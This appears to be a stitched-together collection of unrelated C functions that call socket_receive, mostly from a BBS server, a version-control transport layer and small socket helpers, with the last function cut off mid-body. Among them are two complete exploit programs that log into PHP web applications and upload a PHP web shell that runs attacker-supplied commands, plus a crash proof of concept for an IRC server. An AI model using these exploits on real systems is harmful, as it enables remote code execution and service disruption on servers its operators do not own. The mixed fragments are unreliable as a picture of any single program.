char *http_get_status_code( int socket, int timeout ) { char *result = NULL; if( socket_select( socket, timeout ) == 0 ) { return result; } int buffer_length = 24; char *buffer = ( char * )malloc( buffer_length ); if( socket_receive( socket, buffer, buffer_length ) != buffer_length ) { free( buffer ); return result; } result = ( char * )malloc( 4 ); memcpy( result, buffer + 9, 3 ); *( result + 3 ) = '\0'; while( socket_receive( socket, buffer, buffer_length ) == buffer_length ); free( buffer ); return result; }
/* ** Read N bytes of content directly from the wire and write into ** the buffer. */ static int transport_fetch(char *zBuf, int N){ int got; if( sshIn ){ int x; int wanted = N; got = 0; while( wanted>0 ){ x = read(sshIn, &zBuf[got], wanted); if( x<=0 ) break; got += x; wanted -= x; } }else if( g.urlIsHttps ){ #ifdef FOSSIL_ENABLE_SSL got = ssl_receive(0, zBuf, N); #else got = 0; #endif }else if( g.urlIsFile ){ got = fread(zBuf, 1, N, transport.pFile); }else{ got = socket_receive(0, zBuf, N); } /* printf("received %d of %d bytes\n", got, N); fflush(stdout); */ return got; }
/* * Check enough diskspace. * return 0=No, 1=Yes, 2=Unknown, 3=Error */ int enoughspace(unsigned int needed) { char *buf; int rc = 3, cnt; unsigned int avail = 0L; buf = calloc(SS_BUFSIZE, sizeof(char)); snprintf(buf, SS_BUFSIZE, "DSPC:1,%d;", needed); if (socket_send(buf) == 0) { snprintf(buf, SS_BUFSIZE, "%s", socket_receive()); strtok(buf, ":"); cnt = atoi(strtok(NULL, ",")); if (cnt == 1) { rc = atoi(strtok(NULL, ";")); } else if (cnt == 2) { rc = atoi(strtok(NULL, ",")); avail = atol(strtok(NULL, ";")); if (rc == 0) Syslog('+', "Only %ld MBytes diskspace, need %ld MBytes", avail, needed); } else { Syslog('-', "Error in enoughspace()"); } } free(buf); return rc; }
bool socket_server_serve (socket_t *server, socket_t *client, socket_client_handler_t handler) { char *buffer; bool handled; if (!socket_accept (server, client)) { return true; } buffer = (char *) malloc (sizeof (char) * 1024); if (!socket_receive (client, buffer, 1024)) { (void) socket_close (client); free (buffer); return true; } if (!socket_close (client)) { free (buffer); return true; } handled = handler ? handler (buffer) : socket_default_client_handler (buffer); free (buffer); return handled; }
void fillFromSocketIfNeeded() { int space; if (rx->head>rx->tail) { // head after tail, so can fill up to end of buffer space = SERIAL_BUFFER_SIZE-rx->tail; } else { space = rx->tail-rx->head; // may be 0 } if (socket!=SOCKET_INVALID && space>0) { socket_receive(socket, rx->buffer+rx->head, space, 0); } }
int IsZMH() { static char buf[81]; snprintf(buf, 81, "SBBS:0;"); if (socket_send(buf) == 0) { strncpy(buf, socket_receive(), 80); if (strncmp(buf, "100:2,2", 7) == 0) return TRUE; } return FALSE; }
void SockS(const char *format, ...) { char *out; va_list va_ptr; out = calloc(SS_BUFSIZE, sizeof(char)); va_start(va_ptr, format); vsnprintf(out, SS_BUFSIZE, format, va_ptr); va_end(va_ptr); if (socket_send(out) == 0) socket_receive(); free(out); }
static void socat_handle_receive(void *opaque) { Socat *socat = opaque; int length; length = socket_receive(socat->socket, (uint8_t *)&socat->notification + socat->notification_used, sizeof(CronNotification) - socat->notification_used); if (length == 0) { log_debug("Socat (handle: %d) disconnected by peer", socat->socket->handle); socat->disconnected = true; return; } if (length < 0) { if (errno_interrupted()) { log_debug("Receiving from socat (handle: %d) was interrupted, retrying", socat->socket->handle); } else if (errno_would_block()) { log_debug("Receiving from socat (handle: %d) Daemon would block, retrying", socat->socket->handle); } else { log_error("Could not receive from socat (handle: %d), disconnecting socat: %s (%d)", socat->socket->handle, get_errno_name(errno), errno); socat->disconnected = true; } return; } socat->notification_used += length; if (socat->notification_used < (int)sizeof(CronNotification)) { // wait for complete request return; } cron_handle_notification(&socat->notification); log_debug("Socat (handle: %d) received complete request, disconnecting socat", socat->socket->handle); socat->disconnected = true; }
unsigned int sequencer() { char *buf, *res; unsigned int seq = 0; buf = calloc(SS_BUFSIZE, sizeof(char)); snprintf(buf, SS_BUFSIZE, "SSEQ:0;"); if (socket_send(buf) == 0) { free(buf); buf = socket_receive(); res = strtok(buf, ","); res = strtok(NULL, ";"); seq = atol(res); } return seq; }
char *SockR(const char *format, ...) { static char buf[SS_BUFSIZE]; char *out; va_list va_ptr; memset(&buf, 0, SS_BUFSIZE); out = calloc(SS_BUFSIZE, sizeof(char)); va_start(va_ptr, format); vsnprintf(out, SS_BUFSIZE, format, va_ptr); va_end(va_ptr); if (socket_send(out) == 0) snprintf(buf, SS_BUFSIZE, "%s", socket_receive()); free(out); return buf; }
/* * Check BBS open status, return FALSE if the bbs is closed. * Display the reason why to the user. */ int CheckStatus() { static char buf[81], msg[81]; snprintf(buf, 81, "SBBS:0;"); if (socket_send(buf) == 0) { strncpy(buf, socket_receive(), 80); if (strncmp(buf, "100:2,0", 7) == 0) return TRUE; if ((strncmp(buf, "100:2,2", 7) == 0) && (!ttyinfo.honor_zmh)) return TRUE; buf[strlen(buf) -1] = '\0'; Enter(2); PUTCHAR('\007'); snprintf(msg, 81, "*** %s ***", cldecode(buf+8)); PUTSTR(msg); Syslog('+', "Send user message \"%s\"", cldecode(buf+8)); Enter(3); } return FALSE; }
int main(int argc, char *argv[]) { int sd; char code[] = "--AaB03x\r\n" "Content-Disposition: form-data; name=\"doc\"; filename=\"shell.php\"\r\n" "Content-Type: text/plain\r\n" "\r\n" "<?php echo \"<pre>\"; system($_GET['cmd']); echo \"</pre>\"?>\r\n" "--AaB03x\r\n" "Content-Disposition: form-data; name=\"desc\"\r\n" "\r\n" "description\r\n" "--AaB03x\r\n" "Content-Disposition: form-data; name=\"submitadd\"\r\n" "\r\n" "Submit\r\n" "--AaB03x--\r\n", *buffer = NULL, *rec = NULL, *session = NULL; if(argc < 5) { usage(argv[0]); return -1; } if(!(buffer = (char *)calloc(200+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3])+strlen(argv[4]), sizeof(char)))) { perror("calloc"); return -1; } sprintf(buffer, "POST %sindex.php HTTP/1.1\r\n" "Host: %s\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Content-Length: %d\r\n\r\nuser=%s&pass=%s&submit=Login", argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3], argv[4]); printf("\n[*] Connecting..."); if((sd = socket_connect(argv[1], 80)) < 0) { printf("[-] Connection failed!\n\n"); free(buffer); return -1; } printf("\n[+] Connected" "\n[*] Send login..."); if(socket_send(sd, buffer, strlen(buffer)) < 0) { printf("[-] Sending failed!\n\n"); free(buffer); close(sd); return -1; } if(!(rec = socket_receive(sd, 0))) { printf("[-] Receive failed!\n\n"); free(buffer); close(sd); return -1; } if(!strstr(rec, "Login Successful")) { printf("\n[-] Login Incorrect!\n\n"); free(buffer); close(sd); return -1; } session = strstr(rec, "PHPSESSID"); session = strtok(session, ";"); if((sd = socket_connect(argv[1], 80)) < 0) { printf("[-] Connection failed!\n\n"); free(buffer); return -1; } printf("\n[+] Login Successful" "\n[+] Uploading..."); sprintf(buffer, "POST %sdocuments.php HTTP/1.1\r\n" "Host: %s\r\n" "Cookie: %s\r\n" "Content-type: multipart/form-data, boundary=AaB03x\r\n" "Content-Length: %d\r\n\r\n%s", argv[2], argv[1], session, strlen(code), code); if(socket_send(sd, buffer, strlen(buffer)) < 0) { printf("[-] Sending failed!\n\n"); free(buffer); close(sd); return -1; } if(!(rec = socket_receive(sd, 0))) { printf("[-] Receive failed!\n\n"); free(buffer); close(sd); return -1; } if(!strstr(rec, "Uploaded Successfully")) { printf("\n[-] Upload failed!\n\n"); free(buffer); close(sd); return -1; } free(buffer); close(sd); printf("\n[+] Shell uploaded" "\n[+] Connection closed\n\n" "Open your browser and go to http://%s%sgallery/documents/shell.php?cmd=[commands]\n\n", argv[1], argv[2]); return 0; }
void menu() { FILE *pMenuFile; int Key, IsANSI; char temp[81], *Input, *sMenuPathFileName, buf[81]; Input = calloc(PATH_MAX, sizeof(char)); sMenuPathFileName = calloc(PATH_MAX, sizeof(char)); Syslog('+', "Starting menu loop"); /* * Loop forever, this is what a BBS should do until a user logs out. */ while (TRUE) { WhosDoingWhat(BROWSING, NULL); /* * Open menufile, first users language menu, if it fails * try to open the default menu. */ snprintf(sMenuPathFileName, PATH_MAX, "%s/share/int/menus/%s/%s", getenv("FTND_ROOT"), lang.lc, Menus[MenuLevel]); if ((pMenuFile = fopen(sMenuPathFileName, "r")) == NULL) { snprintf(sMenuPathFileName, PATH_MAX, "%s/share/int/menus/%s/%s", getenv("FTND_ROOT"), CFG.deflang, Menus[MenuLevel]); pMenuFile = fopen(sMenuPathFileName,"r"); if (pMenuFile != NULL) Syslog('b', "Menu %s (Default)", Menus[MenuLevel]); } else { Syslog('b', "Menu %s (%s)", Menus[MenuLevel], lang.Name); } if (pMenuFile == NULL) { clear(); WriteError("Can't open menu file: %s", sMenuPathFileName); MenuError++; /* * Is this the last attempt to open the default menu? */ if (MenuError == 10) { WriteError("FATAL ERROR: Too many menu errors"); snprintf(temp, 81, "Too many menu errors, notifying Sysop\r\n\r\n"); PUTSTR(temp); sleep(3); die(FTNERR_CONFIG_ERROR); } /* * Switch back to the default menu */ MenuLevel = 0; strcpy(Menus[0], CFG.default_menu); } else { /* * Display Menu Text Fields and Perform all autoexec menus in order of menu file. * First check if there are any ANSI menus, if not, send a clearscreen first. */ IsANSI = FALSE; while (fread(&menus, sizeof(menus), 1, pMenuFile) == 1) { if ( Le_Access(exitinfo.Security, menus.MenuSecurity) && (UserAge >= le_int(menus.Age))){ if ((le_int(menus.MenuType) == 5) || (le_int(menus.MenuType) == 19) || (le_int(menus.MenuType) == 20)) IsANSI = TRUE; } } fseek(pMenuFile, 0, SEEK_SET); if (! IsANSI) clear(); while (fread(&menus, sizeof(menus), 1, pMenuFile) == 1) { if ( Le_Access(exitinfo.Security, menus.MenuSecurity) && (UserAge >= le_int(menus.Age))){ if (menus.AutoExec) { DoMenu( le_int(menus.MenuType) ); } DisplayMenu( ); } } /* * Check if the BBS closed down for Zone Mail Hour or * system shutdown. If so, we run the Goodbye show. */ if (CheckStatus() == FALSE) { fclose(pMenuFile); Syslog('+', "Kicking user out, the BBS is closed."); sleep(3); Good_Bye(FTNERR_OK); } /* * Check the upsdown semafore */ if (IsSema((char *)"upsdown")) { fclose(pMenuFile); Syslog('+', "Kicking user out, upsdown semafore detected"); snprintf(temp, 81, "System power failure, closing the bbs"); PUTSTR(temp); Enter(2); sleep(3); Good_Bye(FTNERR_OK); } /* * Check if SysOp wants to chat to user everytime user gets prompt. */ if (CFG.iChatPromptChk) { snprintf(buf, 81, "CISC:1,%d", mypid); if (socket_send(buf) == 0) { strcpy(buf, socket_receive()); if (strcmp(buf, "100:1,1;") == 0) { Syslog('+', "Forced sysop/user chat"); Chat(exitinfo.Name, (char *)"#sysop"); continue; } } } /* * Check users timeleft */ TimeCheck(); alarm_on(); if (exitinfo.HotKeys) { Key = Readkey(); snprintf(Input, 81, "%c", Key); Enter(1); } else { colour(CFG.InputColourF, CFG.InputColourB); GetstrC(Input, 80); } if ((strcmp(Input, "")) != 0) { fseek(pMenuFile, 0, SEEK_SET); while (fread(&menus, sizeof(menus), 1, pMenuFile) == 1) { if ((strcmp(tu(Input), menus.MenuKey)) == 0) { if ((Le_Access(exitinfo.Security, menus.MenuSecurity)) && (UserAge >= le_int(menus.Age))) { Syslog('+', "Menu[%d] %d=(%s), Opt: '%s'", MenuLevel, le_int(menus.MenuType), menus.TypeDesc, menus.OptionalData); if (le_int(menus.MenuType) == 13) { /* * Terminate call, cleanup here */ free(Input); free(sMenuPathFileName); fclose(pMenuFile); } DoMenu(le_int(menus.MenuType)); break; } } } } fclose(pMenuFile); } /* If menu open */ } /* while true */ }
/** Receive a packet through the given socket * * Note that you will receive a socket not the number of readed packets. * You can access that information through packet_rcv_bytes. */ lpacket*packet_receive(lsocket*sck){ char*message=malloc(sizeof(char)*SIZE_BUFFER); if (message==NULL) ERROR("lPacket malloc"); packet_rcv_bytes=socket_receive(sck,message,SIZE_BUFFER); return packet_request(message); }
/** [Deprecated] Receive a message with less information to provide, * note that it is advised to use a packet instead. */ char *socket_message_receive(lsocket*sck){ char*message=malloc(sizeof(char)*SIZE_BUFFER); socket_receive(sck,message,SIZE_BUFFER); return message; }
void user(void) { FILE *pUsrConfig, *pLimits; int i, x, FoundName = FALSE, iFoundLimit = FALSE, IsNew = FALSE, logins = 0, Start; int l1, l2; char *token, temp[PATH_MAX], temp1[84], UserName[37], buf[128], *fullname; time_t LastLogin; struct stat st; grecno = 0; Syslog('+', "Unixmode login: %s", sUnixName); snprintf(temp, PATH_MAX, "%s/etc/users.data", getenv("FTND_ROOT")); if ((pUsrConfig = fopen(temp,"r+")) == NULL) { /* * This should not happen. */ WriteError("$Can't open %s", temp); PUTSTR((char *)"Can't open userfile, run \"newuser\" first"); Enter(1); ExitClient(FTNERR_OK); } fread(&usrconfighdr, sizeof(usrconfighdr), 1, pUsrConfig); while (fread(&usrconfig, usrconfighdr.recsize, 1, pUsrConfig) == 1) { if (strcmp(usrconfig.Name, sUnixName) == 0) { FoundName = TRUE; break; } else grecno++; } if (!FoundName) { fclose(pUsrConfig); snprintf(temp, PATH_MAX, "Unknown username: %s\r\n", sUnixName); PUTSTR(temp); /* FATAL ERROR: You are not in the BBS users file.*/ snprintf(temp, PATH_MAX, "%s\r\n", (char *) Language(389)); PUTSTR(temp); /* Please run 'newuser' to create an account */ snprintf(temp, PATH_MAX, "%s\r\n", (char *) Language(390)); PUTSTR(temp); Syslog('?', "FATAL: Could not find user in BBS users file."); Syslog('?', " and system is using unix accounts\n"); Free_Language(); ExitClient(FTNERR_OK); } /* * Copy username, split first and lastname. */ strncpy(UserName, usrconfig.sUserName, sizeof(UserName)-1); if ((strchr(UserName,' ') == NULL) && !CFG.iOneName) { token = strtok(UserName, " "); strncpy(FirstName, token, sizeof(FirstName)-1); token = strtok(NULL, "\0"); i = strlen(token); for (x = 2; x < i; x++) { if (token[x] == ' ') token[x] = '\0'; } strncpy(LastName, token, sizeof(LastName)-1); } else strncpy(FirstName, UserName, sizeof(FirstName)-1); strncpy(UserName, usrconfig.sUserName, sizeof(UserName)-1); Syslog('+', "%s On-Line from \"%s\", node %d", UserName, ttyinfo.comment, iNode); IsDoing("Just Logged In"); /* * Check some essential files, create them if they don't exist. */ ChkFiles(); /* * Setup users favourite language. */ utf8 = (usrconfig.Charset == FTNC_UTF8); Set_Language(usrconfig.iLanguage); Free_Language(); InitLanguage(); /* * User logged in, tell it to the server. Check if a location is * set, if Ask User location for new users is off, this field is * empty but we have to send something to the server. */ if (strlen(usrconfig.sLocation)) UserCity(mypid, usrconfig.Name, usrconfig.sLocation); else UserCity(mypid, usrconfig.Name, (char *)"N/A"); /* * Count simultaneous logins */ Start = TRUE; while (TRUE) { if (Start) snprintf(buf, 128, "GMON:1,1;"); else snprintf(buf, 128, "GMON:1,0;"); Start = FALSE; if (socket_send(buf) == 0) { strcpy(buf, socket_receive()); if (strncmp(buf, "100:0;", 6) == 0) break; /* No more data */ if (strstr(buf, "ftnbbs")) { /* * Only ftnbbs is wanted */ strtok(buf, ","); /* response */ strtok(NULL, ","); /* pid */ strtok(NULL, ","); /* tty */ fullname = xstrcpy(cldecode(strtok(NULL, ","))); /* username */ if (strcmp(fullname, usrconfig.Name) == 0) { logins++; } free(fullname); } } } if (CFG.max_logins && (logins > CFG.max_logins)) { Syslog('+', "User logins %d, allowed %d, disconnecting", logins, CFG.max_logins); colour(LIGHTRED, BLACK); snprintf(temp, PATH_MAX, "%s %d %s\r\n", (char *) Language(18), CFG.max_logins, (char *) Language(19)); PUTSTR(temp); Quick_Bye(FTNERR_INIT_ERROR); } /* * Set last file and message area so these numbers are saved when * the user hangs up or is logged off before het gets to the main * menu. Later in this function the areas are set permanent. */ iAreaNumber = usrconfig.iLastFileArea; iMsgAreaNumber = usrconfig.iLastMsgArea; /* * See if this user is the Sysop. */ strcpy(temp, UserName); strcpy(temp1, CFG.sysop_name); if ((strcasecmp(CFG.sysop_name, UserName)) == 0) { /* * If login name is sysop, set SYSOP true */ SYSOP = TRUE; Syslog('+', "Sysop is online"); } /* * Is this a new user? */ if (usrconfig.iTotalCalls == 0) IsNew = TRUE; /* * Pause after logo screen. */ alarm_on(); Pause(); if (usrconfig.Archiver[0] == '\0') { usrconfig.Archiver[0] = 'Z'; usrconfig.Archiver[1] = 'I'; usrconfig.Archiver[2] = 'P'; Syslog('+', "Setup default archiver ZIP"); } /* * Check users date format. We do it strict as we * need this to be good for several other purposes. * If it is correct, the users age is set in UserAge */ if (!Test_DOB(usrconfig.sDateOfBirth)) { Syslog('!', "Error in Date of Birth"); Chg_DOB(); strcpy(usrconfig.sDateOfBirth, exitinfo.sDateOfBirth); } /* * Check to see if user must expire */ snprintf(temp,PATH_MAX, "%s", (char *) GetDateDMY()); SwapDate(temp, usrconfig.sExpiryDate); /* Convert Date1 & Date2 to longs for compare */ l1 = atol(Date1); l2 = atol(Date2); if (l1 >= l2 && l2 != 0) { /* * If Expiry Date is the same as today expire to * Expire Sec level */ usrconfig.Security = usrconfig.ExpirySec; Syslog('!', "User is expired, resetting level"); /* * Show texfile to user telling him about this. */ DisplayFile((char *)"expired"); } free(Date1); free(Date2); /* * Copy limits.data into memory */ snprintf(temp, PATH_MAX, "%s/etc/limits.data", getenv("FTND_ROOT")); if ((pLimits = fopen(temp,"rb")) == NULL) { WriteError("$Can't open %s", temp); } else { fread(&LIMIThdr, sizeof(LIMIThdr), 1, pLimits); while (fread(&LIMIT, sizeof(LIMIT), 1, pLimits) == 1) { if (LIMIT.Security == usrconfig.Security.level) { iFoundLimit = TRUE; break; } } fclose(pLimits); } if (!iFoundLimit) { WriteError("Unknown Security Level in limits.data"); usrconfig.iTimeLeft = 0; /* Could not find limit, so set to Zero */ usrconfig.iTimeUsed = 0; /* Set to Zero as well */ } else { /* * Give user new time limit everyday, also new users get a new limit. */ snprintf(temp,PATH_MAX, "%s", (char *) GetDateDMY()); if (((strcmp(StrDateDMY(usrconfig.tLastLoginDate), temp)) != 0) || IsNew) { /* * If no timelimit set give user 24 hours. */ if (LIMIT.Time) usrconfig.iTimeLeft = LIMIT.Time; else usrconfig.iTimeLeft = 86400; usrconfig.iTimeUsed = 0; /* Set time used today to Zero */ usrconfig.iConnectTime = 0; /* Set connect time to Zero */ /* * Give user new bytes and files every day if needed. */ if (LIMIT.DownK) { usrconfig.DownloadKToday = LIMIT.DownK; } if (LIMIT.DownF) { usrconfig.DownloadsToday = LIMIT.DownF; } } } /* End of else */ usrconfig.iConnectTime = 0; /* Copy Users Protocol into Memory */ Set_Protocol(usrconfig.sProtocol); tlf(usrconfig.sProtocol); /* * Set last login Date and Time, copy previous session * values in memory. */ snprintf(LastLoginDate, 12, "%s", StrDateDMY(usrconfig.tLastLoginDate)); snprintf(LastLoginTime, 9, "%s", StrTimeHMS(usrconfig.tLastLoginDate)); LastLogin = usrconfig.tLastLoginDate; usrconfig.tLastLoginDate = ltime; /* Set current login to current date */ usrconfig.iTotalCalls++; /* * Update user record. */ if (fseek(pUsrConfig, usrconfighdr.hdrsize + (grecno * usrconfighdr.recsize), 0) != 0) { WriteError("Can't seek in %s/etc/users.data", getenv("FTND_ROOT")); } else { fwrite(&usrconfig, sizeof(usrconfig), 1, pUsrConfig); } fclose(pUsrConfig); /* * Write users structure to tmp file in ~/home/unixname/exitinfo * A copy of the userrecord is also in the variable exitinfo. */ if (! InitExitinfo()) Good_Bye(FTNERR_INIT_ERROR); /* * If user has not set a preferred character set, force this */ if (exitinfo.Charset == FTNC_NONE) { Chg_Charset(); } setlocale(LC_CTYPE, getlocale(exitinfo.Charset)); Syslog('b', "setlocale(LC_CTYPE, NULL) returns \"%s\"", printable(setlocale(LC_CTYPE, NULL), 0)); GetLastUser(); StartTime = xstrcpy(GetLocalHM()); ChangeHomeDir(exitinfo.Name, exitinfo.Email); Syslog('+', "User successfully logged into BBS"); Syslog('+', "Level %d (%s), %d mins. left, port %s", exitinfo.Security.level, LIMIT.Description, exitinfo.iTimeLeft, pTTY); Time2Go = time(NULL); Time2Go += exitinfo.iTimeLeft * 60; iUserTimeLeft = exitinfo.iTimeLeft; IsDoing("Welcome screens"); DisplayFile((char *)"mainlogo"); DisplayFile((char *)"welcome"); /* * The following files are only displayed if the user has * turned the Bulletins on. */ if (exitinfo.ieNEWS) { DisplayFile((char *)"welcome1"); DisplayFile((char *)"welcome2"); DisplayFile((char *)"welcome3"); DisplayFile((char *)"welcome4"); DisplayFile((char *)"welcome5"); DisplayFile((char *)"welcome6"); DisplayFile((char *)"welcome7"); DisplayFile((char *)"welcome8"); DisplayFile((char *)"welcome9"); snprintf(temp, PATH_MAX, "%s", (char *) GetDateDMY() ); if ((strcmp(exitinfo.sDateOfBirth, temp)) == 0) DisplayFile((char *)"birthday"); /* * Displays file if it exists DD-MM.A?? */ snprintf(temp, PATH_MAX, "%s", (char *) GetDateDMY()); strcpy(temp1, ""); strncat(temp1, temp, 5); snprintf(temp, PATH_MAX, "%s", temp1); DisplayFile(temp); /* * Displays users security file if it exists */ snprintf(temp, PATH_MAX, "sec%d", exitinfo.Security.level); DisplayFile(temp); /* * Display News file */ DisplayFile((char *)"news"); } /* * Display Onceonly file, first get the date of that * file, search order is the same as in DisplayFile() */ st.st_mtime = 0; snprintf(temp, PATH_MAX, "%s/share/int/txtfiles/%s/onceonly.ans", getenv("FTND_ROOT"), lang.lc); stat(temp, &st); if (st.st_mtime == 0) { snprintf(temp, PATH_MAX, "%s/share/int/txtfiles/%s/onceonly.ans", getenv("FTND_ROOT"), CFG.deflang); stat(temp, &st); } if (st.st_mtime == 0) { snprintf(temp, PATH_MAX, "%s/share/int/txtfiles/%s/onceonly.asc", getenv("FTND_ROOT"), lang.lc); stat(temp, &st); if (st.st_mtime == 0) { snprintf(temp, PATH_MAX, "%s/share/int/txtfiles/%s/onceonly.asc", getenv("FTND_ROOT"), CFG.deflang); stat(temp, &st); } } if ((st.st_mtime != 0) && (LastLogin < st.st_mtime)) DisplayFile((char *)"onceonly"); OLR_SyncTags(); if (exitinfo.MailScan) { IsDoing("New mail check"); CheckMail(); } /* * We don't show new files to new users. */ if (exitinfo.ieFILE && (!IsNew)) { IsDoing("New files check"); NewfileScan(FALSE); } /* * Copy last file Area in to current Area */ SetFileArea(exitinfo.iLastFileArea); /* * Copy Last Message Area in to Current Msg Area */ SetMsgArea(usrconfig.iLastMsgArea); SetEmailArea((char *)"mailbox"); /* * Set or Reset the DoNotDisturb flag, now is the time * we may be interrupted. */ UserSilent(usrconfig.DoNotDisturb); /* * Start the menu. */ menu(); }
int main(int argc, char *argv[]) { int sd, option, optidx, port = 80, clen, pkglen; char *buffer = NULL, *rec = NULL, *session = NULL, *host = NULL, *path = NULL, *user = NULL, *passwd = NULL, code[] = "--AaB03x\r\n" "Content-Disposition: form-data; name=\"photo\"; filename=\"evil.php5\"\r\n" "Content-Type: image/jpeg\r\n" "\r\n" "<?php echo \"<pre>\"; system($_GET[cmd]); echo \"</pre>\"?>\r\n" "--AaB03x\r\n" "Content-Disposition: form-data; name=\"Call\"\r\n" "\r\n" "add\r\n" "--AaB03x\r\n" "Content-Disposition: form-data; name=\"photoType\"\r\n" "\r\n" "P\r\n" "--AaB03x\r\n" "Content-Disposition: form-data; name=\"image.x\"\r\n" "\r\n" "8\r\n" "--AaB03x\r\n" "Content-Disposition: form-data; name=\"image.y\"\r\n" "\r\n" "5\r\n" "--AaB03x--\r\n"; struct option long_options[] = { {"host", 1, 0, 1 }, {"port", 1, 0, 2 }, {"path", 1, 0, 3 }, {"username", 1, 0, 'u'}, {"password", 1, 0, 'p'}, {NULL, 0, 0, 0 }, }; if(argc < 2) { usage(argv[0]); return -1; } while((option = getopt_long(argc, argv, "u:p:", long_options, &optidx)) > 0) { switch(option) { case 1: host = optarg; break; case 2: port = atoi(optarg); break; case 3: path = optarg; break; case 'u': user = optarg; break; case 'p': passwd = optarg; break; default: usage(argv[0]); return -1; break; } } if(!host || !path || !user || !passwd || port < 0) { usage(argv[0]); return -1; } printf("\n[*] Connecting...\n"); if((sd = socket_connect(host, port)) < 0) { printf("[-] Connection failed!\n\n"); free(buffer); return -1; } printf("[+] Connected" "\n[*] Login..."); clen = strlen(user)+strlen(passwd)+16; pkglen = vspr(&buffer, "POST %scheck_login.php HTTP/1.1\r\n" "Host: %s\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Content-Length: %d\r\n" "\r\n" "email=%s&password=%s", path, host, clen, user, passwd); if(send(sd, buffer, pkglen, 0) < 0) { printf("[-] Sending failed!\n\n"); free(buffer); close(sd); return -1; } if(!(rec = socket_receive(sd, 0))) { printf("[-] Receive failed!\n\n"); free(buffer); close(sd); return -1; } if(strstr(rec, "Password is invalid")) { printf("\n[-] Login Incorrect!\n\n"); free(buffer); close(sd); return -1; } session = strstr(rec, "PHPSESSID"); if(!session) { printf("\n[-] Session error!\n\n"); free(buffer); close(sd); return -1; } session = strtok(session, ";"); if(!session) { printf("\n[-] Session error!\n\n"); free(buffer); close(sd); return -1; } printf("\n[+] Login Successful" "\n[*] Uploading...\n"); close(sd); if((sd = socket_connect(host, port)) < 0) { printf("[-] Connection failed!\n\n"); free(buffer); return -1; } free(buffer); clen = strlen(code); pkglen = vspr(&buffer, "POST %spopups/photos.php HTTP/1.1\r\n" "Host: %s\r\n" "Cookie: %s\r\n" "Content-type: multipart/form-data, boundary=AaB03x\r\n" "Content-Length: %d\r\n" "\r\n" "%s", path, host, session, clen, code); if(send(sd, buffer, pkglen, 0) < 0) { printf("[-] Sending failed!\n\n"); free(buffer); close(sd); return -1; } if(!(rec = socket_receive(sd, 3))) { printf("[-] Receive failed!\n\n"); free(buffer); close(sd); return -1; } if(!strstr(rec, "evil.php5")) { printf("\n[-] Upload failed!\n\n"); free(buffer); close(sd); return -1; } free(buffer); close(sd); printf("[+] Shell uploaded" "\n[+] Connection closed\n\n"); return 0; }
int main(int argc, char *argv[]) { int sd, rnd_num, len, port = DEFAULT_PORT; char pkg[BUFF_SIZE], *response = NULL, *host = NULL; if(argc < 2) { printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta" "\nhttp://www.salvatorefresta.net" "\n" "\nUsage: %s <target_hostname> <port> (default: %d)\n\n", argv[0], port); return -1; } srand(time(NULL)); host = argv[1]; if(argc > 2) port = atoi(argv[2]); printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta" "\nhttp://www.salvatorefresta.net" "\n\n[*] Connecting to %s:%hu...", host, port); sd = socket_connect(host, port); if(sd < 0) { printf("\n[-] Error on connect!\n\n"); return -1; } printf("\n[+] Connection estabilished" "\n[*] Loggin to IRC server..."); login: rnd_num = rand()%100+1; len = snprintf(pkg, sizeof(pkg), "NICK randomnickname%d\r\n", rnd_num); if(len < 0 || len > sizeof(pkg)) { perror("\n[-] Error: snprintf"); socket_close(sd); return -1; } if(socket_send(sd, pkg, len) < 0) { perror("\n[-] Error: socket_send"); socket_close(sd); return -1; } response = socket_receive(sd, 3); if(!response) { perror("\n[-] Error: socket_receive"); socket_close(sd); return -1; } if(strstr(response, "Nickname is already in use")) { free(response); goto login; } free(response); printf("\n[+] Login successfully" "\n[*] Data sending..."); rnd_num = rand()%100+1; len = snprintf(pkg, sizeof(pkg), "USER blabla\r\nTOPIC #ch%d\r\n", rnd_num); if(len < 0 || len > sizeof(pkg)) { perror("\n[-] Error: snprintf"); socket_close(sd); return -1; } if(socket_send(sd, pkg, len) < 0) { perror("\n[-] Error: socket_send"); socket_close(sd); return -1; } response = socket_receive(sd, 3); if(!response) { perror("\n[-] Error: socket_receive"); socket_close(sd); return -1; } socket_close(sd); printf("\n[+] Data sent successfully" "\n[+] Connection closed\n\n"); return 0; }
/* * Chat, if the parameters are not NULL, a connection with the named * channel is made with the give username which will be forced to the * used nick name. This mode is used for forced sysop chat. * If the parameters are NULL, then it's up to the user what happens. */ void Chat(char *username, char *channel) { int width, curpos = 0, stop = FALSE, data, rc; unsigned char ch; char sbuf[81], resp[128], *name, *mname; static char buf[200]; time_t c_start, c_end; WhosDoingWhat(SYSOPCHAT, NULL); clear(); rsize = rows - 5; rpointer = 0; if (SYSOP == TRUE) { /* * Forbid the sysop to chat, the sysop MUST use mbmon. */ Syslog('+', "The Sysop attempted to chat"); pout(LIGHTRED, BLACK, (char *) Language(29)); Enter(1); Pause(); return; } if (username && channel) { colour(LIGHTGREEN, BLACK); PUTCHAR('\007'); /* *** Sysop is starting chat *** */ pout(LIGHTGREEN, BLACK, (char *) Language(59)); Enter(1); sleep(1); PUTCHAR('\007'); sleep(1); PUTCHAR('\007'); Syslog('+', "Sysop chat started"); chat_with_sysop = TRUE; } else { Syslog('+', "User started chatting"); } /* * Setup the screen, this is only possible in ANSI mode. */ clear(); locate(1, 1); colour(WHITE, BLUE); snprintf(buf, 200, "%-*s", cols, " MBSE BBS Chat Server"); mvprintw(1, 1, buf); mname = xstrcpy(clencode(exitinfo.sUserName)); name = xstrcpy(clencode(exitinfo.Name)); width = cols - (strlen(name) + 3); snprintf(buf, 200, "CCON,4,%d,%s,%s,0;", mypid, mname, name); free(mname); free(name); if (socket_send(buf) == 0) { strncpy(buf, socket_receive(), sizeof(buf)-1); if (strncmp(buf, "200:1,", 6) == 0) { Syslog('!', "Chat server is not available"); colour(LIGHTRED, BLACK); mvprintw(4, 1, (char *) Language(30)); Enter(2); Pause(); chat_with_sysop = FALSE; return; } } locate(rows - 2, 1); colour(WHITE, BLUE); snprintf(buf, 200, "%-*s", cols, " Type \"/EXIT\" to exit or \"/HELP\" for help."); mvprintw(rows - 2, 1, buf); colour(WHITE, BLACK); mvprintw(rows - 1, 1, ">"); mvprintw(rows - 1, width + 2, "<"); 